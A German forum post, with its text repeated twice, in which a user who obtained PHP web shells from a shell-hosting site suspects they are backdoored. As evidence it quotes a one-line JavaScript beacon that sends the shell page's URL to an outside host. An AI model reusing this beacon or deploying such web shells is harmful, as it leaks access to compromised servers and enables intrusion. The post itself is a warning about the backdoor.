Kataklysmos
11.01.12, 20:09
Hallo,
viele von euch kennen sicher den Shellhoster "r57.gen.tr", bei dem es die meisten PHP- Shells zum download gibt. Auch ich habe mich bei dessen Angebot bedient und glaube, es bereuen zu müssen.
Vor kurzem, sehr kurzem, sah ich genau meine URL zu der Shell, welche wirklich meine URL war und ganz sicher in keinen Google- Index kommt, und fragte mich, woher zum Teufel die Person die URL hat. Aus reiner Verzweiflung habe ich die URL einfach mal bei Google eingegeben und sah einen Fund: [Link nur für registrierte und freigeschaltete Mitglieder sichtbar]
Ich schaute mir die Datei an und es sind etliche URLs von PHP- Shells. Daraufhin googlete ich das Verzeichnis ( [Link nur für registrierte und freigeschaltete Mitglieder sichtbar] ). Die Ergebnisse waren etliche JS- Codes, welche scheinbar in den Shells von der Seite inkludiert wurden:
a=new/**/Image();a.src='[Link nur für registrierte und freigeschaltete Mitglieder sichtbar]'+escape(location.href);
Ich testete selber diesen PHP- Script mit einem dummen GET- Parameter und sah dieses nun gleich unten auf der oben erwähnten Liste stehen.
Somit vermute ich, dass r57.gen.ts ihre Dateien backdoored.
Was meint ihr dazu?
Kataklysmos
viele von euch kennen sicher den Shellhoster "r57.gen.tr", bei dem es die meisten PHP- Shells zum download gibt. Auch ich habe mich bei dessen Angebot bedient und glaube, es bereuen zu müssen.
Vor kurzem, sehr kurzem, sah ich genau meine URL zu der Shell, welche wirklich meine URL war und ganz sicher in keinen Google- Index kommt, und fragte mich, woher zum Teufel die Person die URL hat. Aus reiner Verzweiflung habe ich die URL einfach mal bei Google eingegeben und sah einen Fund: [Link nur für registrierte und freigeschaltete Mitglieder sichtbar]
Ich schaute mir die Datei an und es sind etliche URLs von PHP- Shells. Daraufhin googlete ich das Verzeichnis ( [Link nur für registrierte und freigeschaltete Mitglieder sichtbar] ). Die Ergebnisse waren etliche JS- Codes, welche scheinbar in den Shells von der Seite inkludiert wurden:
a=new/**/Image();a.src='[Link nur für registrierte und freigeschaltete Mitglieder sichtbar]'+escape(location.href);
Ich testete selber diesen PHP- Script mit einem dummen GET- Parameter und sah dieses nun gleich unten auf der oben erwähnten Liste stehen.
Somit vermute ich, dass r57.gen.ts ihre Dateien backdoored.
Was meint ihr dazu?
Kataklysmos